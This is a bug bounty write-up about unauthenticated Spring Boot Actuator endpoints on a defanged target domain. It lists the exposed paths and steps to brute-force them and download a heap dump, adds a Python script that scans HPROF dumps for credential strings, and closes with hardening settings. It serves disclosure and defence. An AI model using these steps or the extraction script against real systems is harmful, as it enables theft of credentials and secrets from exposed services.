Sensitive Information disclosure via Spring Boot Default Paths

João Victor - Jun 7 - Dev Community

Reward: $250
Program: Private

Overview of the Vulnerability
Disclosure of secrets for a publicly available asset occurs when sensitive data is reachable without an authorization barrier. This can happen in several ways, such as storing data unencrypted, committing secrets to public GitHub repositories, or exposing internal assets externally. An attacker who obtains such secrets can use them to gain privileged access to the application or to the environment where it is hosted, and from there act with the privileges of an administrator, depending on the permission level the leaked secrets grant.

Business Impact
Disclosure of secrets for a publicly available asset can lead to indirect financial loss when an attacker accesses, deletes, or modifies data within the application. Reputational damage can follow from the loss of customer trust that such events cause. The severity of the impact depends on the sensitivity of the data stored in and transmitted by the application.

Spring Boot Actuator endpoints on c4ng4c31r0[.]com are reachable without authentication and disclose critical information such as internal paths, environment configuration and, through the heap dump, the application's in-memory secrets.
Spring Boot Actuator paths found:
https://c4ng4c31r0[.]com/api/maintenance/actuator/heapdump
https://c4ng4c31r0[.]com/api/maintenance/actuator
https://c4ng4c31r0[.]com/api/maintenance/actuator/beans
https://c4ng4c31r0[.]com/api/maintenance/actuator/caches
https://c4ng4c31r0[.]com/api/maintenance/actuator/conditions
https://c4ng4c31r0[.]com/api/maintenance/actuator/configprops
https://c4ng4c31r0[.]com/api/maintenance/actuator/env
https://c4ng4c31r0[.]com/api/maintenance/actuator/env/home
https://c4ng4c31r0[.]com/api/maintenance/actuator/env/lang
https://c4ng4c31r0[.]com/api/maintenance/actuator/env/language
https://c4ng4c31r0[.]com/api/maintenance/actuator/env/path
https://c4ng4c31r0[.]com/api/maintenance/actuator/env/hostname
https://c4ng4c31r0[.]com/api/maintenance/actuator/features
https://c4ng4c31r0[.]com/api/maintenance/actuator/health
https://c4ng4c31r0[.]com/api/maintenance/actuator/info
https://c4ng4c31r0[.]com/api/maintenance/actuator/mappings
https://c4ng4c31r0[.]com/api/maintenance/actuator/metrics
https://c4ng4c31r0[.]com/api/maintenance/actuator/loggers
https://c4ng4c31r0[.]com/api/maintenance/actuator/scheduledtasks
https://c4ng4c31r0[.]com/api/maintenance/actuator/threaddump

Steps to reproduce:
1 - Use the wordlist [https://github.com/emadshanab/DIR-WORDLISTS/blob/main/spring-boot.txt] to brute-force paths under https://c4ng4c31r0[.]com/api/maintenance/.
2 - Note that the heapdump endpoint is among the results. Requesting it triggers an automatic download of a binary file (a JVM heap dump in HPROF format).
3 - Open the file in VisualVM (https://visualvm.github.io/); the strings held in the JVM heap, including configuration values and credentials, are readable in plain text. Even where the env endpoint masks values whose keys look sensitive, the heap dump contains the raw in-memory strings.
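As an added example that is not part of the original report, the following Python script does offline what the author did in VisualVM: it verifies that the downloaded blob really is an HPROF heap dump, lists the class and symbol names carried in the dump's STRING records, and scans the raw bytes for credential-looking strings in the two encodings the JVM uses to store String contents (Latin-1 compact strings on JDK 9+, big-endian UTF-16 char[] on JDK 8). The HPROF blob it parses is constructed inline for the demo rather than taken from any target, and the key-name pattern is an assumption to tune per engagement.

```python
"""Offline triage of a downloaded Spring Boot actuator heapdump (HPROF format).

Constructed example: checks that the download is an HPROF heap dump, walks its
top-level records, and scans the raw bytes for credential-looking strings in
the two encodings java.lang.String uses in memory.
"""
import re
import struct

# HPROF header: "JAVA PROFILE 1.0.x\0", u4 identifier size, u8 timestamp (ms)
HPROF_MAGIC = b"JAVA PROFILE 1.0."
TAG_STRING = 0x01      # STRING IN UTF8: id + utf8 bytes (class/field names, symbols)
TAG_HEAP_DUMP = 0x0C   # HEAP DUMP (0x1C = HEAP DUMP SEGMENT): object and array contents

# Runs of printable text: compact strings (Latin-1 byte[], JDK 9+) and UTF-16BE char[] (JDK 8)
ASCII_RUN = re.compile(rb"[\x20-\x7e]{8,}")
UTF16BE_RUN = re.compile(rb"(?:\x00[\x20-\x7e]){8,}")
# Assumed, hypothetical key-name pattern; extend it for the target's naming conventions
SECRET_KEY = re.compile(r"passw(or)?d|secret|token|api[_-]?key|private[_-]?key|authorization", re.I)


def is_hprof(data: bytes) -> bool:
    """True if the blob starts with the NUL-terminated HPROF version string."""
    return data.startswith(HPROF_MAGIC) and b"\x00" in data[:32]


def hprof_records(data: bytes):
    """Yield (tag, identifier_size, body) for each top-level HPROF record."""
    nul = data.index(b"\x00")
    id_size = struct.unpack(">I", data[nul + 1:nul + 5])[0]
    pos = nul + 1 + 4 + 8                        # skip magic, id size, timestamp
    while pos + 9 <= len(data):                  # record header: u1 tag, u4 time, u4 length
        tag = data[pos]
        length = struct.unpack(">I", data[pos + 5:pos + 9])[0]
        yield tag, id_size, data[pos + 9:pos + 9 + length]
        pos += 9 + length


def string_record_names(data: bytes):
    """Names from STRING records: a first hint of which frameworks and beans are loaded."""
    return [body[id_size:].decode("utf-8", "replace")
            for tag, id_size, body in hprof_records(data) if tag == TAG_STRING]


def extract_strings(data: bytes):
    """Printable runs in both encodings; heap segments are not decrypted, just raw bytes."""
    for m in ASCII_RUN.finditer(data):
        yield m.group().decode("ascii")
    for m in UTF16BE_RUN.finditer(data):
        yield m.group().decode("utf-16-be")


def find_secrets(data: bytes):
    """Deduplicated, sorted strings that look like credentials anywhere in the dump."""
    return sorted({s for s in extract_strings(data) if SECRET_KEY.search(s)})


def build_sample_heapdump() -> bytes:
    """Constructed HPROF-shaped blob for the demo; not a real JVM dump."""
    header = b"JAVA PROFILE 1.0.2\x00" + struct.pack(">IQ", 8, 0)

    def record(tag, body):
        return bytes([tag]) + struct.pack(">II", 0, len(body)) + body

    def string_rec(obj_id, text):
        return record(TAG_STRING, struct.pack(">Q", obj_id) + text.encode("utf-8"))

    # Property values as they sit in the heap: one compact string, one UTF-16 char[]
    heap = (b"spring.datasource.password=Sup3rS3cret!" + b"\x00" * 4
            + "aws.secretKey=EXAMPLEabcdefghijklmnop".encode("utf-16-be") + b"\x00" * 4
            + b"java.lang.String" + b"\x00" * 4)
    return (header
            + string_rec(1, "org.springframework.core.env.PropertySource")
            + string_rec(2, "javax.sql.DataSource")
            + record(TAG_HEAP_DUMP, heap))


if __name__ == "__main__":
    dump = build_sample_heapdump()
    print("hprof:", is_hprof(dump))
    print("names:", string_record_names(dump))
    for hit in find_secrets(dump):
        print("possible secret:", hit)
```

On a real download, replace build_sample_heapdump() with the file contents. The raw scan is what makes heapdump worse than env: the Environment endpoint's sanitizer masks values in its JSON response, but the String objects in memory are unmasked, so anything the application ever held (datasource passwords, API tokens, session cookies) is recoverable with nothing more than a strings-style pass.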

PoC
Using VisualVM to open the heap dump and read plaintext credentials:

[Screenshots: VisualVM heap dump view showing plaintext credentials]

Status/Reward:
Resolved!
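The report does not say how the program fixed the issue. The standard Spring Boot hardening, added here as an example and not taken from the report or the target, is to allow-list only the endpoints monitoring needs, disable the ones that expose memory and configuration, and keep the management interface off the public network; the port number is an assumption, and an authentication layer (for example Spring Security rules on the actuator paths) is still needed because exposure settings are not access control:

```properties
# Weak: every Actuator endpoint, heapdump included, is served on the
# application port (the typical root cause of findings like this one)
# management.endpoints.web.exposure.include=*

# Hardened: allow-list only what monitoring needs
management.endpoints.web.exposure.include=health,info

# Belt and braces: disable the endpoints that leak memory contents and config,
# so they stay off even if the allow-list is widened later
management.endpoint.heapdump.enabled=false
management.endpoint.threaddump.enabled=false
management.endpoint.env.enabled=false
management.endpoint.configprops.enabled=false

# Health details only for authenticated callers
management.endpoint.health.show-details=when-authorized

# Serve management endpoints on a separate port that is not routed from the
# internet (assumption: 9090 is reachable only from the internal monitoring network)
management.server.port=9090
```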

